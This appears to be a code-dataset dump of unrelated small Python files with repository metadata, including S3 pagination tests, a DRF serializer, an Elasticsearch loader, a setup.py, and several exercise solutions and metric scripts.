self.assertEqual(iterators[0].result_key, 'Uploads')
self.assertEqual(len(list(iterators[0])), 8)
# With a max items of 1.
pages = operation.paginate(self.endpoint,
max_items=1,
bucket=self.bucket_name)
iterators = pages.result_key_iters()
self.assertEqual(len(iterators), 1)
self.assertEqual(iterators[0].result_key, 'Uploads')
self.assertEqual(len(list(iterators[0])), 1)
# Works similar with build_full_result()
pages = operation.paginate(self.endpoint,
max_items=1,
bucket=self.bucket_name)
full_result = pages.build_full_result()
self.assertEqual(len(full_result['Uploads']), 1)
def test_paginate_within_page_boundaries(self):
self.create_object('a')
self.create_object('b')
self.create_object('c')
self.create_object('d')
operation = self.service.get_operation('ListObjects')
# First do it without a max keys so we're operating on a single page of
# results.
pages = operation.paginate(self.endpoint, max_items=1,
bucket=self.bucket_name)
first = pages.build_full_result()
t1 = first['NextToken']
pages = operation.paginate(self.endpoint, max_items=1,
starting_token=t1,
bucket=self.bucket_name)
second = pages.build_full_result()
t2 = second['NextToken']
pages = operation.paginate(self.endpoint, max_items=1,
starting_token=t2,
bucket=self.bucket_name)
third = pages.build_full_result()
t3 = third['NextToken']
pages = operation.paginate(self.endpoint, max_items=1,
starting_token=t3,
bucket=self.bucket_name)
fourth = pages.build_full_result()
self.assertEqual(first['Contents'][-1]['Key'], 'a')
self.assertEqual(second['Contents'][-1]['Key'], 'b')
self.assertEqual(third['Contents'][-1]['Key'], 'c')
self.assertEqual(fourth['Contents'][-1]['Key'], 'd')
def test_unicode_key_put_list(self):
# Verify we can upload a key with a unicode char and list it as well.
key_name = u'\u2713'
self.create_object(key_name)
operation = self.service.get_operation('ListObjects')
parsed = operation.call(self.endpoint, bucket=self.bucket_name)[1]
self.assertEqual(len(parsed['Contents']), 1)
self.assertEqual(parsed['Contents'][0]['Key'], key_name)
operation = self.service.get_operation('GetObject')
parsed = operation.call(self.endpoint, bucket=self.bucket_name, key=key_name)[1]
self.assertEqual(parsed['Body'].read().decode('utf-8'), 'foo')
if __name__ == '__main__':
unittest.main()
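# Note (added for reference): these are live integration tests -- they create
# and delete real S3 buckets, so valid AWS credentials must be configured.
# The __main__ guard above also lets the module run directly, e.g.
# `python test_s3.py`.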
| [
"[email protected]"
] | |
8e858adedb2bd3195fa4dfb7bb2b4c6af2189603 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03910/s110121278.py | 4c9ecfd6bfbe6621fcbe2a07ea7568326440d590 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | N = int(input())
s = 0
j = 1
# Find the smallest j such that 1 + 2 + ... + j >= N.
for i in range(1, N+1):
    s += i
    if s >= N:
        j = i
        break
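# Example (illustrative): N = 4 gives j = 3 (since 1+2+3 = 6 >= 4) and
# k = 2 below, so the loop prints 1 and 3, which sum to exactly 4.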
# The prefix sum overshoots N by k = s - N, with 0 <= k < j; dropping the
# single number k (k = 0 drops nothing) leaves a sum of exactly N.
k = s - N
for i in range(1, j+1):
    if i == k:
        continue
print(i) | [
"[email protected]"
] | |
6adc117fbecb878e659be7ef8fe69003caf90078 | 9ac91b5fca46997a484fe0dd9a9d23e01dae5c7c | /OOP/OOP3.py | 1d6abae38d36497d7429d8e9b897e612cd43503d | [] | no_license | HomeNerd/OrneklerPython7 | b03e649a3f1c9c23730a3eeb723b0df4890273f7 | 711e26917244d89cdf492df0489d02b630732215 | refs/heads/master | 2020-06-08T15:26:37.974583 | 2019-08-08T12:58:24 | 2019-08-08T12:58:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | class KatHarita:
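    # Class attributes for a simple floor-map example (Turkish identifiers
    # kept as-is; roughly: en_sayi/boy_sayi are grid width/height counts,
    # magazametre/yolmetre are metres allotted to shops and walkways).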
en_sayi = 10
boy_sayi = 10
magazametre = 50
yolmetre = 50
print(dir(KatHarita))
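# Illustrative addition: class attributes can also be read directly off the
# class object, without creating an instance.
print(KatHarita.en_sayi)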
| [
"[email protected]"
] | |
fa1fa3378a017fe7890883215c6f4ed40f43828a | a2b696ba8edd5e6b8aa1a4c4aea19cc56e6beb66 | /api/serializers.py | d4db895abe2ac6146ca319be0a8d40433d07655a | [] | no_license | kyrios213/drf-django | 7163eeaba2f32cd0f1cfa5871718c1892a7dc83a | d61438bbb919e7ab845da14bf04cfd85d108de73 | refs/heads/main | 2023-06-05T03:19:33.440410 | 2021-06-21T03:23:46 | 2021-06-21T03:23:46 | 378,791,890 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | from rest_framework import serializers, viewsets
from django.contrib.auth import get_user_model
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ['id', 'email', 'password']
extra_kwargs = {'password': {'write_only': True, 'min_length': 8}}
def create(self, validated_data):
return get_user_model().objects.create_user(**validated_data)
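# A minimal viewset wired to the serializer above (an illustrative sketch,
# not part of the original module; it also puts the otherwise-unused
# `viewsets` import to work). Registration with a router is assumed to
# happen elsewhere, e.g. router.register('users', UserViewSet).
class UserViewSet(viewsets.ModelViewSet):
    queryset = get_user_model().objects.all()
    serializer_class = UserSerializer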
| [
"[email protected]"
] | |
9132e1ad54fca3fe47ba425f3bbb3e1377737f65 | 6b6bf72694e5aa6425f11c956e4a5371b2c73e09 | /populate/main.py | bcccf70630692e0c3d23db7eb0615a5c25787907 | [] | no_license | danielspeixoto/elasticsearch-workshop | 5d9dccebb80bf58b786f167ff8eb6de8a0282a8c | 9872831361ea349453b8e202eb02880c43cbc238 | refs/heads/master | 2020-04-02T01:18:28.858625 | 2018-10-25T22:24:28 | 2018-10-25T22:24:28 | 153,848,788 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | from helpers.Index import Index, connect
from helpers.XMLRepository import XMLRepository
connection = connect("localhost", "9200")  # local Elasticsearch node (default port)
index = Index(connection, "meu-index")  # target index for the workshop data
dados = XMLRepository("./datasets/bitcoin/")  # XML documents parsed from disk
index.bulk_insert(dados.data())  # bulk-index every parsed document
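# Assumes an Elasticsearch node is already running and reachable on
# localhost:9200 before this script is executed.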
| [
"[email protected]"
] | |
15aa14bd147b72e801f55c46ff70efe32d7ef80e | d6074aac6e9e5f2fa5355c3c9ddaebe892c4151d | /setup.py | 8813b411347ea2ca52a5f6274befae3a458b8877 | [
"BSD-2-Clause"
] | permissive | pombredanne/pydeps | f5aae8b825cf86db8308adad808b4bbf8cee52a2 | 95833f42f86f9c5c23ef14b675828d0ddc4df73e | refs/heads/master | 2021-01-18T07:52:41.522028 | 2016-05-19T13:53:14 | 2016-05-19T13:53:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 913 | py |
import setuptools
from distutils.core import setup
setup(
name='pydeps',
version='1.2.7',
packages=['pydeps'],
install_requires=[
'enum34'
],
long_description=open('README.rst').read(),
entry_points={
'console_scripts': [
'pydeps = pydeps.pydeps:pydeps',
]
},
url='https://github.com/thebjorn/pydeps',
license='BSD',
author='bjorn',
author_email='[email protected]',
description='Display module dependencies',
classifiers=[
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
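# Typical invocations for this setup script (for reference; run from the
# project root): `pip install .` for a regular install, or `pip install -e .`
# for an editable development install.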
| [
"[email protected]"
] | |
1ded2999966d01cb7228a2a4f5bc86303d668757 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /aYTLW5jmRoXhnnzwj_3.py | 9f67e5f61283ae4dd389aefbe398689d6bd08e13 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 61 | py |
query = " select name from employees where salary > 45000"
| [
"[email protected]"
] | |
7cb57f1aee5711236c63768e429265d71ba59e80 | 21b461b71b4c63f7aac341bd12ba35d211c7956e | /codes/03_func/Graph_Permutation_isomorphic/01_test_permutation.py | 587c4d9c282ed70920f61d81d9c4546575e05260 | [] | no_license | Ziaeemehr/workshop_scripting | cebdcb552720f31fd6524fd43f257ca46baf70e2 | ed5f232f6737bc9f750d704455442f239d4f0561 | refs/heads/main | 2023-08-22T23:00:36.121267 | 2023-07-19T10:53:41 | 2023-07-19T10:53:41 | 153,342,386 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 771 | py | """
Graph isomorphism via vertex permutation: A_G = P A_H P.T,
where P is a permutation matrix and P.T is the transpose of P
(row i of P selects vertex alpha[i] of H).
"""
import numpy as np
import networkx as nx
def permutation(alpha, n):
    # Build the n x n permutation matrix with P[i][alpha[i]] = 1.
    P = np.zeros((n, n), dtype=int)
    for i in range(n):
        P[i][alpha[i]] = 1
    return P
A_G = np.array([[0, 1, 0, 0, 0],
[1, 0, 1, 0, 1],
[0, 1, 0, 1, 1],
[0, 0, 1, 0, 1],
[0, 1, 1, 1, 0]])
A_H = np.array([[0, 1, 1, 1, 0],
[1, 0, 1, 0, 0],
[1, 1, 0, 1, 0],
[1, 0, 1, 0, 1],
[0, 0, 0, 1, 0]])
# arbitrary permutation of nodes.
alpha = [4, 3, 0, 1, 2]
P = permutation(alpha, 5)
A_Gp = np.matmul(np.matmul(P, A_H), P.T)
# Check that the permuted A_H reproduces A_G (should print True).
print(np.array_equal(A_Gp, A_G))
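# Optional cross-check with networkx (an added sketch, not part of the
# original construction; assumes networkx >= 2.0 for from_numpy_array):
# is_isomorphic should likewise report the two graphs as isomorphic.
print(nx.is_isomorphic(nx.from_numpy_array(A_G), nx.from_numpy_array(A_H)))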
| [
"[email protected]"
] | |
38bbf0422041425be9f4f1aac557fcfbfe23a739 | 694d57c3e512ce916269411b51adef23532420cd | /leetcode_review2/74search_a_2D_matrix.py | 866fe5944bf1f8a5a7c20dee6738ef99ba24a70b | [] | no_license | clovery410/mycode | 5541c3a99962d7949832a0859f18819f118edfba | e12025e754547d18d5bb50a9dbe5e725fd03fd9c | refs/heads/master | 2021-05-16T02:46:47.996748 | 2017-05-10T23:43:50 | 2017-05-10T23:43:50 | 39,235,141 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 421 | py | class Solution(object):
    def searchMatrix(self, matrix, target):
        # Staircase search: start at the top-right corner; step left when the
        # current value is too large, down when it is too small. Each step
        # discards one row or one column, so the search runs in O(m + n).
        m, n = len(matrix), len(matrix[0]) if len(matrix) > 0 else 0
        cur_i, cur_j = 0, n-1
        while cur_i < m and cur_j >= 0:
            if target == matrix[cur_i][cur_j]:
                return True
            if target < matrix[cur_i][cur_j]:
                cur_j -= 1
            else:
                cur_i += 1
        return False
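# A minimal sanity check for the staircase search (illustrative values):
if __name__ == '__main__':
    sample = [[1, 3, 5, 7],
              [10, 11, 16, 20],
              [23, 30, 34, 60]]
    print(Solution().searchMatrix(sample, 16))  # True
    print(Solution().searchMatrix(sample, 13))  # False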
| [
"[email protected]"
] | |
b76b50f294cf1d7560a3699d3704b41173c7ea8c | c956401119e44e41f3873b4734c857eda957e2cd | /metrics/lr_smape.py | 8a71c4a237fb069f751070fdc252cea4f1b598f7 | [] | no_license | zhekunz2/c4pp | 6f689bce42215507d749b8b2be96c7f68ed8c49c | 9f8054addb48d9440662d8c8f494359846423ffd | refs/heads/master | 2020-09-24T06:17:29.866975 | 2019-12-03T17:41:25 | 2019-12-03T17:41:25 | 225,678,894 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 880 | py | #!/usr/bin/env python
import os
import json
import sys
import numpy as np
try:
    smape_thres = float(sys.argv[1])
    weight = float(sys.argv[2])
    bias = float(sys.argv[3])
    data_dir = sys.argv[4]
    with open(os.path.join(data_dir, 'data.json')) as json_data:
        d = json.load(json_data)
    # 'x' sorts before 'y', so data_x/data_y pick out the two series.
    datas = [x for x in d.keys() if x == 'x' or x == 'y']
    data_x = sorted(datas)[0]
    data_y = sorted(datas)[1]
    # Linear prediction y_hat = weight * x + bias for every x in the data.
    predict = [weight * x + bias for x in d[data_x]]
    observe = d[data_y]
    # Per-point symmetric absolute percentage error |o - p| / (|o| + |p|);
    # this variant omits the usual factor of 2, so each term lies in [0, 1].
    ape = np.zeros(len(observe))
    for i, p in enumerate(predict):
        o = observe[i]
        ape[i] = abs(o - p) / (abs(o) + abs(p))
smape = np.mean(ape)
if abs(smape) <= smape_thres:
print('True: ' + str(smape))
else:
print('False: ' + str(smape))
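    # Worked example (hypothetical numbers, not tied to any real data.json):
    # weight=2, bias=0, x=[1, 2], y=[2, 5] gives predictions [2, 4]; the
    # per-point terms are 0 and 1/9, so smape = (0 + 1/9)/2 ~= 0.056, and a
    # threshold of 0.1 would print True.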
except Exception:
    print('Error')
exit(0) | [
"[email protected]"
] |